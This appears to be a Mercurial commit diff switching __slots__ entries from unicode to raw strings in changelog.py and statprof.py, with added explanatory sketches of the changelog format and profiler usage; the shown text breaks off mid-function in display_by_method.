global: use raw strings for __slots__...
Gregory Szorc
r41997:ae189674 default
diff --git a/mercurial/changelog.py b/mercurial/changelog.py
@@ -1,582 +1,582 @@
# changelog.py - changelog class for mercurial
#
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import absolute_import

from .i18n import _
from .node import (
    bin,
    hex,
    nullid,
)
from .thirdparty import (
    attr,
)

from . import (
    encoding,
    error,
    pycompat,
    revlog,
    util,
)
from .utils import (
    dateutil,
    stringutil,
)

_defaultextra = {'branch': 'default'}

def _string_escape(text):
    """
    >>> from .pycompat import bytechr as chr
    >>> d = {b'nl': chr(10), b'bs': chr(92), b'cr': chr(13), b'nul': chr(0)}
    >>> s = b"ab%(nl)scd%(bs)s%(bs)sn%(nul)sab%(cr)scd%(bs)s%(nl)s" % d
    >>> s
    'ab\\ncd\\\\\\\\n\\x00ab\\rcd\\\\\\n'
    >>> res = _string_escape(s)
    >>> s == stringutil.unescapestr(res)
    True
    """
    # subset of the string_escape codec
    text = text.replace('\\', '\\\\').replace('\n', '\\n').replace('\r', '\\r')
    return text.replace('\0', '\\0')

def decodeextra(text):
    """
    >>> from .pycompat import bytechr as chr
    >>> sorted(decodeextra(encodeextra({b'foo': b'bar', b'baz': chr(0) + b'2'})
    ...                    ).items())
    [('baz', '\\x002'), ('branch', 'default'), ('foo', 'bar')]
    >>> sorted(decodeextra(encodeextra({b'foo': b'bar',
    ...                                 b'baz': chr(92) + chr(0) + b'2'})
    ...                    ).items())
    [('baz', '\\\\\\x002'), ('branch', 'default'), ('foo', 'bar')]
    """
    extra = _defaultextra.copy()
    for l in text.split('\0'):
        if l:
            if '\\0' in l:
                # fix up \0 without getting into trouble with \\0
                l = l.replace('\\\\', '\\\\\n')
                l = l.replace('\\0', '\0')
                l = l.replace('\n', '')
            k, v = stringutil.unescapestr(l).split(':', 1)
            extra[k] = v
    return extra

def encodeextra(d):
    # keys must be sorted to produce a deterministic changelog entry
    items = [
        _string_escape('%s:%s' % (k, pycompat.bytestr(d[k])))
        for k in sorted(d)
    ]
    return "\0".join(items)

def stripdesc(desc):
    """strip trailing whitespace and leading and trailing empty lines"""
    return '\n'.join([l.rstrip() for l in desc.splitlines()]).strip('\n')

class appender(object):
    '''the changelog index must be updated last on disk, so we use this class
    to delay writes to it'''
    def __init__(self, vfs, name, mode, buf):
        self.data = buf
        fp = vfs(name, mode)
        self.fp = fp
        self.offset = fp.tell()
        self.size = vfs.fstat(fp).st_size
        self._end = self.size

    def end(self):
        return self._end
    def tell(self):
        return self.offset
    def flush(self):
        pass

    @property
    def closed(self):
        return self.fp.closed

    def close(self):
        self.fp.close()

    def seek(self, offset, whence=0):
        '''virtual file offset spans real file and data'''
        if whence == 0:
            self.offset = offset
        elif whence == 1:
            self.offset += offset
        elif whence == 2:
            self.offset = self.end() + offset
        if self.offset < self.size:
            self.fp.seek(self.offset)

    def read(self, count=-1):
        '''only trick here is reads that span real file and data'''
        ret = ""
        if self.offset < self.size:
            s = self.fp.read(count)
            ret = s
            self.offset += len(s)
            if count > 0:
                count -= len(s)
        if count != 0:
            doff = self.offset - self.size
            self.data.insert(0, "".join(self.data))
            del self.data[1:]
            s = self.data[0][doff:doff + count]
            self.offset += len(s)
            ret += s
        return ret

    def write(self, s):
        self.data.append(bytes(s))
        self.offset += len(s)
        self._end += len(s)

    def __enter__(self):
        self.fp.__enter__()
        return self

    def __exit__(self, *args):
        return self.fp.__exit__(*args)

def _divertopener(opener, target):
    """build an opener that writes in 'target.a' instead of 'target'"""
    def _divert(name, mode='r', checkambig=False):
        if name != target:
            return opener(name, mode)
        return opener(name + ".a", mode)
    return _divert

def _delayopener(opener, target, buf):
    """build an opener that stores chunks in 'buf' instead of 'target'"""
    def _delay(name, mode='r', checkambig=False):
        if name != target:
            return opener(name, mode)
        return appender(opener, name, mode, buf)
    return _delay

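An editor's sketch (not part of the commit) of how these two wrappers
behave; the `vfs` opener below is hypothetical:

    buf = []                                # collects index writes in memory
    delayed = _delayopener(vfs, '00changelog.i', buf)
    fp = delayed('00changelog.i', 'a+')     # an appender: writes land in buf
    fp.write(b'...index entry...')
    delayed('00changelog.d', 'a+')          # any other file opens normally
    # _divertopener instead redirects the same target to '00changelog.i.a'
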
@attr.s
class _changelogrevision(object):
    # Extensions might modify _defaultextra, so let the constructor below pass
    # it in
    extra = attr.ib()
    manifest = attr.ib(default=nullid)
    user = attr.ib(default='')
    date = attr.ib(default=(0, 0))
    files = attr.ib(default=attr.Factory(list))
    description = attr.ib(default='')

class changelogrevision(object):
    """Holds results of a parsed changelog revision.

    Changelog revisions consist of multiple pieces of data, including
    the manifest node, user, and date. This object exposes a view into
    the parsed object.
    """

    __slots__ = (
-        u'_offsets',
-        u'_text',
+        r'_offsets',
+        r'_text',
    )

    def __new__(cls, text):
        if not text:
            return _changelogrevision(extra=_defaultextra)

        self = super(changelogrevision, cls).__new__(cls)
        # We could return here and implement the following as an __init__.
        # But doing it here is equivalent and saves an extra function call.

        # format used:
        # nodeid\n        : manifest node in ascii
        # user\n          : user, no \n or \r allowed
        # time tz extra\n : date (time is int or float, timezone is int)
        #                 : extra is metadata, encoded and separated by '\0'
        #                 : older versions ignore it
        # files\n\n       : files modified by the cset, no \n or \r allowed
        # (.*)            : comment (free text, ideally utf-8)
        #
        # changelog v0 doesn't use extra

        nl1 = text.index('\n')
        nl2 = text.index('\n', nl1 + 1)
        nl3 = text.index('\n', nl2 + 1)

        # The list of files may be empty. Which means nl3 is the first of the
        # double newline that precedes the description.
        if text[nl3 + 1:nl3 + 2] == '\n':
            doublenl = nl3
        else:
            doublenl = text.index('\n\n', nl3 + 1)

        self._offsets = (nl1, nl2, nl3, doublenl)
        self._text = text

        return self

    @property
    def manifest(self):
        return bin(self._text[0:self._offsets[0]])

    @property
    def user(self):
        off = self._offsets
        return encoding.tolocal(self._text[off[0] + 1:off[1]])

    @property
    def _rawdate(self):
        off = self._offsets
        dateextra = self._text[off[1] + 1:off[2]]
        return dateextra.split(' ', 2)[0:2]

    @property
    def _rawextra(self):
        off = self._offsets
        dateextra = self._text[off[1] + 1:off[2]]
        fields = dateextra.split(' ', 2)
        if len(fields) != 3:
            return None

        return fields[2]

    @property
    def date(self):
        raw = self._rawdate
        time = float(raw[0])
        # Various tools did silly things with the timezone.
        try:
            timezone = int(raw[1])
        except ValueError:
            timezone = 0

        return time, timezone

    @property
    def extra(self):
        raw = self._rawextra
        if raw is None:
            return _defaultextra

        return decodeextra(raw)

    @property
    def files(self):
        off = self._offsets
        if off[2] == off[3]:
            return []

        return self._text[off[2] + 1:off[3]].split('\n')

    @property
    def description(self):
        return encoding.tolocal(self._text[self._offsets[3] + 2:])

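For illustration, an editor's sketch (not part of the commit) of a
hand-built revision text in the format documented above, parsed with
changelogrevision; the node and all values are made up:

    _demo = (b'0123456789abcdef0123456789abcdef01234567\n'  # manifest node
             b'Jane Doe <jane@example.com>\n'               # user
             b'1546300800 0 branch:stable\n'                # time tz extra
             b'a.txt\nb.txt\n'                              # files
             b'\n'
             b'commit message')                             # description
    _rev = changelogrevision(_demo)
    # _rev.user  -> b'Jane Doe <jane@example.com>' (via encoding.tolocal)
    # _rev.files -> [b'a.txt', b'b.txt']
    # _rev.extra -> {'branch': 'stable'}
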
class changelog(revlog.revlog):
    def __init__(self, opener, trypending=False):
        """Load a changelog revlog using an opener.

        If ``trypending`` is true, we attempt to load the index from a
        ``00changelog.i.a`` file instead of the default ``00changelog.i``.
        The ``00changelog.i.a`` file contains index (and possibly inline
        revision) data for a transaction that hasn't been finalized yet.
        It exists in a separate file to facilitate readers (such as
        hook processes) accessing data before a transaction is finalized.
        """
        if trypending and opener.exists('00changelog.i.a'):
            indexfile = '00changelog.i.a'
        else:
            indexfile = '00changelog.i'

        datafile = '00changelog.d'
        revlog.revlog.__init__(self, opener, indexfile, datafile=datafile,
                               checkambig=True, mmaplargeindex=True)

        if self._initempty and (self.version & 0xFFFF == revlog.REVLOGV1):
            # changelogs don't benefit from generaldelta.

            self.version &= ~revlog.FLAG_GENERALDELTA
            self._generaldelta = False

        # Delta chains for changelogs tend to be very small because entries
        # tend to be small and don't delta well with each other. So disable
        # delta chains.
        self._storedeltachains = False

        self._realopener = opener
        self._delayed = False
        self._delaybuf = None
        self._divert = False
        self.filteredrevs = frozenset()

    def tiprev(self):
        for i in pycompat.xrange(len(self) - 1, -2, -1):
            if i not in self.filteredrevs:
                return i

    def tip(self):
        """filtered version of revlog.tip"""
        return self.node(self.tiprev())

    def __contains__(self, rev):
        """filtered version of revlog.__contains__"""
        return (0 <= rev < len(self)
                and rev not in self.filteredrevs)

    def __iter__(self):
        """filtered version of revlog.__iter__"""
        if len(self.filteredrevs) == 0:
            return revlog.revlog.__iter__(self)

        def filterediter():
            for i in pycompat.xrange(len(self)):
                if i not in self.filteredrevs:
                    yield i

        return filterediter()

    def revs(self, start=0, stop=None):
        """filtered version of revlog.revs"""
        for i in super(changelog, self).revs(start, stop):
            if i not in self.filteredrevs:
                yield i

    def reachableroots(self, minroot, heads, roots, includepath=False):
        return self.index.reachableroots2(minroot, heads, roots, includepath)

    def _checknofilteredinrevs(self, revs):
        """raise the appropriate error if 'revs' contains a filtered revision

        This returns a version of 'revs' to be used thereafter by the caller.
        In particular, if revs is an iterator, it is converted into a set.
        """
        safehasattr = util.safehasattr
        if safehasattr(revs, '__next__'):
            # Note that inspect.isgenerator() is not true for iterators,
            revs = set(revs)

        filteredrevs = self.filteredrevs
        if safehasattr(revs, 'first'):  # smartset
            offenders = revs & filteredrevs
        else:
            offenders = filteredrevs.intersection(revs)

        for rev in offenders:
            raise error.FilteredIndexError(rev)
        return revs

    def headrevs(self, revs=None):
        if revs is None and self.filteredrevs:
            try:
                return self.index.headrevsfiltered(self.filteredrevs)
            # AttributeError covers non-c-extension environments and
            # old c extensions without filter handling.
            except AttributeError:
                return self._headrevs()

        if self.filteredrevs:
            revs = self._checknofilteredinrevs(revs)
        return super(changelog, self).headrevs(revs)

    def strip(self, *args, **kwargs):
        # XXX make something better than assert
        # We can't expect proper strip behavior if we are filtered.
        assert not self.filteredrevs
        super(changelog, self).strip(*args, **kwargs)

    def rev(self, node):
        """filtered version of revlog.rev"""
        r = super(changelog, self).rev(node)
        if r in self.filteredrevs:
            raise error.FilteredLookupError(hex(node), self.indexfile,
                                            _('filtered node'))
        return r

    def node(self, rev):
        """filtered version of revlog.node"""
        if rev in self.filteredrevs:
            raise error.FilteredIndexError(rev)
        return super(changelog, self).node(rev)

    def linkrev(self, rev):
        """filtered version of revlog.linkrev"""
        if rev in self.filteredrevs:
            raise error.FilteredIndexError(rev)
        return super(changelog, self).linkrev(rev)

    def parentrevs(self, rev):
        """filtered version of revlog.parentrevs"""
        if rev in self.filteredrevs:
            raise error.FilteredIndexError(rev)
        return super(changelog, self).parentrevs(rev)

    def flags(self, rev):
        """filtered version of revlog.flags"""
        if rev in self.filteredrevs:
            raise error.FilteredIndexError(rev)
        return super(changelog, self).flags(rev)

    def delayupdate(self, tr):
        "delay visibility of index updates to other readers"

        if not self._delayed:
            if len(self) == 0:
                self._divert = True
                if self._realopener.exists(self.indexfile + '.a'):
                    self._realopener.unlink(self.indexfile + '.a')
                self.opener = _divertopener(self._realopener, self.indexfile)
            else:
                self._delaybuf = []
                self.opener = _delayopener(self._realopener, self.indexfile,
                                           self._delaybuf)
        self._delayed = True
        tr.addpending('cl-%i' % id(self), self._writepending)
        tr.addfinalize('cl-%i' % id(self), self._finalize)

    def _finalize(self, tr):
        "finalize index updates"
        self._delayed = False
        self.opener = self._realopener
        # move redirected index data back into place
        if self._divert:
            assert not self._delaybuf
            tmpname = self.indexfile + ".a"
            nfile = self.opener.open(tmpname)
            nfile.close()
            self.opener.rename(tmpname, self.indexfile, checkambig=True)
        elif self._delaybuf:
            fp = self.opener(self.indexfile, 'a', checkambig=True)
            fp.write("".join(self._delaybuf))
            fp.close()
            self._delaybuf = None
        self._divert = False
        # split when we're done
        self._enforceinlinesize(tr)

    def _writepending(self, tr):
        "create a file containing the unfinalized state for pretxnchangegroup"
        if self._delaybuf:
            # make a temporary copy of the index
            fp1 = self._realopener(self.indexfile)
            pendingfilename = self.indexfile + ".a"
            # register as a temp file to ensure cleanup on failure
            tr.registertmp(pendingfilename)
            # write existing data
            fp2 = self._realopener(pendingfilename, "w")
            fp2.write(fp1.read())
            # add pending data
            fp2.write("".join(self._delaybuf))
            fp2.close()
            # switch modes so finalize can simply rename
            self._delaybuf = None
            self._divert = True
            self.opener = _divertopener(self._realopener, self.indexfile)

        if self._divert:
            return True

        return False

    def _enforceinlinesize(self, tr, fp=None):
        if not self._delayed:
            revlog.revlog._enforceinlinesize(self, tr, fp)

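    # Editor's note (not part of the commit): the delayed-write lifecycle
    # implemented by the three methods above, with a hypothetical
    # transaction `tr`:
    #
    #   cl.delayupdate(tr)    # writes diverted (empty changelog) or
    #                         # buffered in memory (existing changelog)
    #   ...revisions added here stay invisible to concurrent readers...
    #   tr pending   -> cl._writepending(tr)  writes 00changelog.i.a
    #   tr finalize  -> cl._finalize(tr)      renames/appends the pending
    #                                         data into 00changelog.i
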
    def read(self, node):
        """Obtain data from a parsed changelog revision.

        Returns a 6-tuple of:

           - manifest node in binary
           - author/user as a localstr
           - date as a 2-tuple of (time, timezone)
           - list of files
           - commit message as a localstr
           - dict of extra metadata

        Unless you need to access all fields, consider calling
        ``changelogrevision`` instead, as it is faster for partial object
        access.
        """
        c = changelogrevision(self.revision(node))
        return (
            c.manifest,
            c.user,
            c.date,
            c.files,
            c.description,
            c.extra
        )

    def changelogrevision(self, nodeorrev):
        """Obtain a ``changelogrevision`` for a node or revision."""
        return changelogrevision(self.revision(nodeorrev))

    def readfiles(self, node):
        """
        short version of read that only returns the files modified by the cset
        """
        text = self.revision(node)
        if not text:
            return []
        last = text.index("\n\n")
        l = text[:last].split('\n')
        # the first three lines are the manifest node, user, and date
        return l[3:]

    def add(self, manifest, files, desc, transaction, p1, p2,
            user, date=None, extra=None):
        # Convert to UTF-8 encoded bytestrings as the very first
        # thing: calling any method on a localstr object will turn it
        # into a str object and the cached UTF-8 string is thus lost.
        user, desc = encoding.fromlocal(user), encoding.fromlocal(desc)

        user = user.strip()
        # An empty username or a username with a "\n" will make the
        # revision text contain two "\n\n" sequences -> corrupt
        # repository since read cannot unpack the revision.
        if not user:
            raise error.StorageError(_("empty username"))
        if "\n" in user:
            raise error.StorageError(_("username %r contains a newline")
                                     % pycompat.bytestr(user))

        desc = stripdesc(desc)

        if date:
            parseddate = "%d %d" % dateutil.parsedate(date)
        else:
            parseddate = "%d %d" % dateutil.makedate()
        if extra:
            branch = extra.get("branch")
            if branch in ("default", ""):
                del extra["branch"]
            elif branch in (".", "null", "tip"):
                raise error.StorageError(_('the name \'%s\' is reserved')
                                         % branch)
        if extra:
            extra = encodeextra(extra)
            parseddate = "%s %s" % (parseddate, extra)
        l = [hex(manifest), user, parseddate] + sorted(files) + ["", desc]
        text = "\n".join(l)
        return self.addrevision(text, transaction, len(self), p1, p2)

    def branchinfo(self, rev):
        """return the branch name and open/close state of a revision

        This function exists because creating a changectx object
        just to access this is costly."""
        extra = self.read(rev)[5]
        return encoding.tolocal(extra.get("branch")), 'close' in extra

    def _nodeduplicatecallback(self, transaction, node):
        # keep track of revisions that got "re-added", e.g. unbundle of a
        # known rev.
        #
        # We track them in a list to preserve their order from the source
        # bundle
        duplicates = transaction.changes.setdefault('revduplicates', [])
        duplicates.append(self.rev(node))

diff --git a/mercurial/statprof.py b/mercurial/statprof.py
@@ -1,969 +1,969 @@
#!/usr/bin/env python
## statprof.py
## Copyright (C) 2012 Bryan O'Sullivan <bos@serpentine.com>
## Copyright (C) 2011 Alex Fraser <alex at phatcore dot com>
## Copyright (C) 2004,2005 Andy Wingo <wingo at pobox dot com>
## Copyright (C) 2001 Rob Browning <rlb at defaultvalue dot org>

## This library is free software; you can redistribute it and/or
## modify it under the terms of the GNU Lesser General Public
## License as published by the Free Software Foundation; either
## version 2.1 of the License, or (at your option) any later version.
##
## This library is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
## Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public
## License along with this program; if not, contact:
##
## Free Software Foundation           Voice:  +1-617-542-5942
## 59 Temple Place - Suite 330        Fax:    +1-617-542-2652
## Boston, MA  02111-1307,  USA       gnu@gnu.org

"""
statprof is intended to be a fairly simple statistical profiler for
python. It was ported directly from a statistical profiler for guile,
also named statprof, available from guile-lib [0].

[0] http://wingolog.org/software/guile-lib/statprof/

To start profiling, call statprof.start():
>>> start()

Then run whatever it is that you want to profile, for example:
>>> import test.pystone; test.pystone.pystones()

Then stop the profiling and print out the results:
>>> stop()
>>> display()
  %   cumulative      self
 time    seconds   seconds  name
 26.72      1.40      0.37  pystone.py:79:Proc0
 13.79      0.56      0.19  pystone.py:133:Proc1
 13.79      0.19      0.19  pystone.py:208:Proc8
 10.34      0.16      0.14  pystone.py:229:Func2
  6.90      0.10      0.10  pystone.py:45:__init__
  4.31      0.16      0.06  pystone.py:53:copy
    ...

All of the numerical data is statistically approximate. In the
following column descriptions, and in all of statprof, "time" refers
to execution time (both user and system), not wall clock time.

% time
    The percent of the time spent inside the procedure itself (not
    counting children).

cumulative seconds
    The total number of seconds spent in the procedure, including
    children.

self seconds
    The total number of seconds spent in the procedure itself (not
    counting children).

name
    The name of the procedure.

By default statprof keeps the data collected from previous runs. If you
want to clear the collected data, call reset():
>>> reset()

reset() can also be used to change the sampling frequency from the
default of 1000 Hz. For example, to tell statprof to sample 50 times a
second:
>>> reset(50)

This means that statprof will sample the call stack after every 1/50 of
a second of user + system time spent running on behalf of the python
process. When your process is idle (for example, blocking in a read(),
as is the case at the listener), the clock does not advance. For this
reason statprof is currently not suitable for profiling io-bound
operations.

The profiler uses the hash of the code object itself to identify the
procedures, so it won't confuse different procedures with the same name.
They will show up as two different rows in the output.

Right now the profiler is quite simplistic. I cannot provide
call-graphs or other higher level information. What you see in the
table is pretty much all there is. Patches are welcome :-)


Threading
---------

Because signals only get delivered to the main thread in Python,
statprof only profiles the main thread. However because the time
reporting function uses per-process timers, the results can be
significantly off if other threads' work patterns are not similar to the
main thread's work patterns.
"""
# no-check-code
from __future__ import absolute_import, division, print_function

import collections
import contextlib
import getopt
import inspect
import json
import os
import signal
import sys
import threading
import time

from . import (
    encoding,
    pycompat,
)

defaultdict = collections.defaultdict
contextmanager = contextlib.contextmanager

__all__ = ['start', 'stop', 'reset', 'display', 'profile']

skips = {
    r"util.py:check",
    r"extensions.py:closure",
    r"color.py:colorcmd",
    r"dispatch.py:checkargs",
    r"dispatch.py:<lambda>",
    r"dispatch.py:_runcatch",
    r"dispatch.py:_dispatch",
    r"dispatch.py:_runcommand",
    r"pager.py:pagecmd",
    r"dispatch.py:run",
    r"dispatch.py:dispatch",
    r"dispatch.py:runcommand",
    r"hg.py:<module>",
    r"evolve.py:warnobserrors",
}

###########################################################################
## Utils

def clock():
    # (user+system CPU time, elapsed real time); which of the two gets
    # reported is selected by ProfileState.timeidx below
    times = os.times()
    return (times[0] + times[1], times[4])


###########################################################################
## Collection data structures

class ProfileState(object):
    def __init__(self, frequency=None):
        self.reset(frequency)
        self.track = 'cpu'

    def reset(self, frequency=None):
        # total so far
        self.accumulated_time = (0.0, 0.0)
        # start_time when timer is active
        self.last_start_time = None
        # a float
        if frequency:
            self.sample_interval = 1.0 / frequency
        elif not hasattr(self, 'sample_interval'):
            # default to 1000 Hz
            self.sample_interval = 1.0 / 1000.0
        else:
            # leave the frequency as it was
            pass
        self.remaining_prof_time = None
        # for user start/stop nesting
        self.profile_level = 0

        self.samples = []

    def accumulate_time(self, stop_time):
        increment = (
            stop_time[0] - self.last_start_time[0],
            stop_time[1] - self.last_start_time[1],
        )
        self.accumulated_time = (
            self.accumulated_time[0] + increment[0],
            self.accumulated_time[1] + increment[1],
        )

    def seconds_per_sample(self):
        return self.accumulated_time[self.timeidx] / len(self.samples)

    @property
    def timeidx(self):
        if self.track == 'real':
            return 1
        return 0

state = ProfileState()


class CodeSite(object):
    cache = {}

-    __slots__ = (u'path', u'lineno', u'function', u'source')
+    __slots__ = (r'path', r'lineno', r'function', r'source')

    def __init__(self, path, lineno, function):
        assert isinstance(path, bytes)
        self.path = path
        self.lineno = lineno
        assert isinstance(function, bytes)
        self.function = function
        self.source = None

    def __eq__(self, other):
        try:
            return (self.lineno == other.lineno and
                    self.path == other.path)
        except:
            return False

    def __hash__(self):
        return hash((self.lineno, self.path))

    @classmethod
    def get(cls, path, lineno, function):
        k = (path, lineno)
        try:
            return cls.cache[k]
        except KeyError:
            v = cls(path, lineno, function)
            cls.cache[k] = v
            return v

    def getsource(self, length):
        if self.source is None:
            lineno = self.lineno - 1
            fp = None
            try:
                fp = open(self.path, 'rb')
                for i, line in enumerate(fp):
                    if i == lineno:
                        self.source = line.strip()
                        break
            except:
                pass
            finally:
                if fp:
                    fp.close()
            if self.source is None:
                self.source = ''

        source = self.source
        if len(source) > length:
            source = source[:(length - 3)] + "..."
        return source

    def filename(self):
        return os.path.basename(self.path)

    def skipname(self):
        return r'%s:%s' % (self.filename(), self.function)

class Sample(object):
-    __slots__ = (u'stack', u'time')
+    __slots__ = (r'stack', r'time')

    def __init__(self, stack, time):
        self.stack = stack
        self.time = time

    @classmethod
    def from_frame(cls, frame, time):
        stack = []

        while frame:
            stack.append(CodeSite.get(
                pycompat.sysbytes(frame.f_code.co_filename),
                frame.f_lineno,
                pycompat.sysbytes(frame.f_code.co_name)))
            frame = frame.f_back

        return Sample(stack, time)

###########################################################################
## SIGPROF handler

def profile_signal_handler(signum, frame):
    if state.profile_level > 0:
        now = clock()
        state.accumulate_time(now)

        timestamp = state.accumulated_time[state.timeidx]
        state.samples.append(Sample.from_frame(frame, timestamp))

        signal.setitimer(signal.ITIMER_PROF,
            state.sample_interval, 0.0)
        state.last_start_time = now

stopthread = threading.Event()
def samplerthread(tid):
    while not stopthread.is_set():
        now = clock()
        state.accumulate_time(now)

        frame = sys._current_frames()[tid]

        timestamp = state.accumulated_time[state.timeidx]
        state.samples.append(Sample.from_frame(frame, timestamp))

        state.last_start_time = now
        time.sleep(state.sample_interval)

    stopthread.clear()

###########################################################################
## Profiling API

def is_active():
    return state.profile_level > 0

lastmechanism = None
def start(mechanism='thread', track='cpu'):
    '''Install the profiling signal handler, and start profiling.'''
    state.track = track # note: nesting different mode won't work
    state.profile_level += 1
    if state.profile_level == 1:
        state.last_start_time = clock()
        rpt = state.remaining_prof_time
        state.remaining_prof_time = None

        global lastmechanism
        lastmechanism = mechanism

        if mechanism == 'signal':
            signal.signal(signal.SIGPROF, profile_signal_handler)
            signal.setitimer(signal.ITIMER_PROF,
                rpt or state.sample_interval, 0.0)
        elif mechanism == 'thread':
            frame = inspect.currentframe()
            tid = [k for k, f in sys._current_frames().items() if f == frame][0]
            state.thread = threading.Thread(target=samplerthread,
                                 args=(tid,), name="samplerthread")
            state.thread.start()

def stop():
    '''Stop profiling, and uninstall the profiling signal handler.'''
    state.profile_level -= 1
    if state.profile_level == 0:
        if lastmechanism == 'signal':
            rpt = signal.setitimer(signal.ITIMER_PROF, 0.0, 0.0)
            signal.signal(signal.SIGPROF, signal.SIG_IGN)
            state.remaining_prof_time = rpt[0]
        elif lastmechanism == 'thread':
            stopthread.set()
            state.thread.join()

        state.accumulate_time(clock())
        state.last_start_time = None
        statprofpath = encoding.environ.get('STATPROF_DEST')
        if statprofpath:
            save_data(statprofpath)

    return state

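A direct start/stop sketch (editor's addition, not part of the commit;
display() is defined further down in this file):

    start(mechanism='signal', track='real')  # sample via SIGPROF, report
                                             # wall-clock time
    # ... code under test ...
    stop()
    display()
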
366 def save_data(path):
366 def save_data(path):
367 with open(path, 'w+') as file:
367 with open(path, 'w+') as file:
368 file.write("%f %f\n" % state.accumulated_time)
368 file.write("%f %f\n" % state.accumulated_time)
369 for sample in state.samples:
369 for sample in state.samples:
370 time = sample.time
370 time = sample.time
371 stack = sample.stack
371 stack = sample.stack
372 sites = ['\1'.join([s.path, b'%d' % s.lineno, s.function])
372 sites = ['\1'.join([s.path, b'%d' % s.lineno, s.function])
373 for s in stack]
373 for s in stack]
374 file.write("%d\0%s\n" % (time, '\0'.join(sites)))
374 file.write("%d\0%s\n" % (time, '\0'.join(sites)))
375
375
376 def load_data(path):
376 def load_data(path):
377 lines = open(path, 'rb').read().splitlines()
377 lines = open(path, 'rb').read().splitlines()
378
378
379 state.accumulated_time = [float(value) for value in lines[0].split()]
379 state.accumulated_time = [float(value) for value in lines[0].split()]
380 state.samples = []
380 state.samples = []
381 for line in lines[1:]:
381 for line in lines[1:]:
382 parts = line.split('\0')
382 parts = line.split('\0')
383 time = float(parts[0])
383 time = float(parts[0])
384 rawsites = parts[1:]
384 rawsites = parts[1:]
385 sites = []
385 sites = []
386 for rawsite in rawsites:
386 for rawsite in rawsites:
387 siteparts = rawsite.split('\1')
387 siteparts = rawsite.split('\1')
388 sites.append(CodeSite.get(siteparts[0], int(siteparts[1]),
388 sites.append(CodeSite.get(siteparts[0], int(siteparts[1]),
389 siteparts[2]))
389 siteparts[2]))
390
390
391 state.samples.append(Sample(sites, time))
391 state.samples.append(Sample(sites, time))
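
# Example (illustrative): round-tripping a profile through the on-disk
# format used by save_data()/load_data(). The path is hypothetical:
#
#   save_data('/tmp/prof.data')
#   reset()                        # only valid while not profiling
#   load_data('/tmp/prof.data')
#   display(format=DisplayFormats.ByMethod)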


def reset(frequency=None):
    '''Clear out the state of the profiler. Do not call while the
    profiler is running.

    The optional frequency argument specifies the number of samples to
    collect per second.'''
    assert state.profile_level == 0, "Can't reset() while statprof is running"
    CodeSite.cache.clear()
    state.reset(frequency)


@contextmanager
def profile():
    start()
    try:
        yield
    finally:
        stop()
        display()
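
# Example (illustrative): the context manager is the most convenient entry
# point; it starts sampling on entry and prints a report on exit:
#
#   with profile():
#       run_workload()   # hypothetical function being profiled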


###########################################################################
## Reporting API

class SiteStats(object):
    def __init__(self, site):
        self.site = site
        self.selfcount = 0
        self.totalcount = 0

    def addself(self):
        self.selfcount += 1

    def addtotal(self):
        self.totalcount += 1

    def selfpercent(self):
        return self.selfcount / len(state.samples) * 100

    def totalpercent(self):
        return self.totalcount / len(state.samples) * 100

    def selfseconds(self):
        return self.selfcount * state.seconds_per_sample()

    def totalseconds(self):
        return self.totalcount * state.seconds_per_sample()

    @classmethod
    def buildstats(cls, samples):
        stats = {}

        for sample in samples:
            for i, site in enumerate(sample.stack):
                sitestat = stats.get(site)
                if not sitestat:
                    sitestat = SiteStats(site)
                    stats[site] = sitestat

                sitestat.addtotal()

                if i == 0:
                    sitestat.addself()

        return [s for s in stats.itervalues()]

class DisplayFormats:
    ByLine = 0
    ByMethod = 1
    AboutMethod = 2
    Hotpath = 3
    FlameGraph = 4
    Json = 5
    Chrome = 6
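
# Example (illustrative): selecting an output format by passing one of the
# DisplayFormats constants to display(); the report path is hypothetical:
#
#   with open('/tmp/report.txt', 'wb') as fh:
#       display(fp=fh, format=DisplayFormats.ByLine)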

def display(fp=None, format=DisplayFormats.Hotpath, data=None, **kwargs):
    '''Print statistics, either to stdout or the given file object.'''
    if data is None:
        data = state

    if fp is None:
        import sys
        fp = sys.stdout
    if len(data.samples) == 0:
        fp.write(b'No samples recorded.\n')
        return

    if format == DisplayFormats.ByLine:
        display_by_line(data, fp)
    elif format == DisplayFormats.ByMethod:
        display_by_method(data, fp)
    elif format == DisplayFormats.AboutMethod:
        display_about_method(data, fp, **kwargs)
    elif format == DisplayFormats.Hotpath:
        display_hotpath(data, fp, **kwargs)
    elif format == DisplayFormats.FlameGraph:
        write_to_flame(data, fp, **kwargs)
    elif format == DisplayFormats.Json:
        write_to_json(data, fp)
    elif format == DisplayFormats.Chrome:
        write_to_chrome(data, fp, **kwargs)
    else:
        raise Exception("Invalid display format")

    if format not in (DisplayFormats.Json, DisplayFormats.Chrome):
        fp.write(b'---\n')
        fp.write(b'Sample count: %d\n' % len(data.samples))
        fp.write(b'Total time: %f seconds (%f wall)\n' % data.accumulated_time)

def display_by_line(data, fp):
    '''Print the profiler data with each sample line represented
    as one row in a table. Sorted by self-time per line.'''
    stats = SiteStats.buildstats(data.samples)
    stats.sort(reverse=True, key=lambda x: x.selfseconds())

    fp.write(b'%5.5s %10.10s %7.7s %-8.8s\n' % (
        b'% ', b'cumulative', b'self', b''))
    fp.write(b'%5.5s %9.9s %8.8s %-8.8s\n' % (
        b"time", b"seconds", b"seconds", b"name"))

    for stat in stats:
        site = stat.site
        sitelabel = '%s:%d:%s' % (site.filename(),
                                  site.lineno,
                                  site.function)
        fp.write(b'%6.2f %9.2f %9.2f %s\n' % (
            stat.selfpercent(), stat.totalseconds(),
            stat.selfseconds(), sitelabel))

def display_by_method(data, fp):
    '''Print the profiler data with each sample function represented
    as one row in a table. Important lines within that function are
    output as nested rows. Sorted by self-time per line.'''
    fp.write(b'%5.5s %10.10s %7.7s %-8.8s\n' %
             ('% ', 'cumulative', 'self', ''))
    fp.write(b'%5.5s %9.9s %8.8s %-8.8s\n' %
             ("time", "seconds", "seconds", "name"))

    stats = SiteStats.buildstats(data.samples)

    grouped = defaultdict(list)
    for stat in stats:
        grouped[stat.site.filename() + b":" + stat.site.function].append(stat)

    # compute sums for each function
    functiondata = []
    for fname, sitestats in grouped.iteritems():
        total_cum_sec = 0
        total_self_sec = 0
        total_percent = 0
        for stat in sitestats:
            total_cum_sec += stat.totalseconds()
            total_self_sec += stat.selfseconds()
            total_percent += stat.selfpercent()

        functiondata.append((fname,
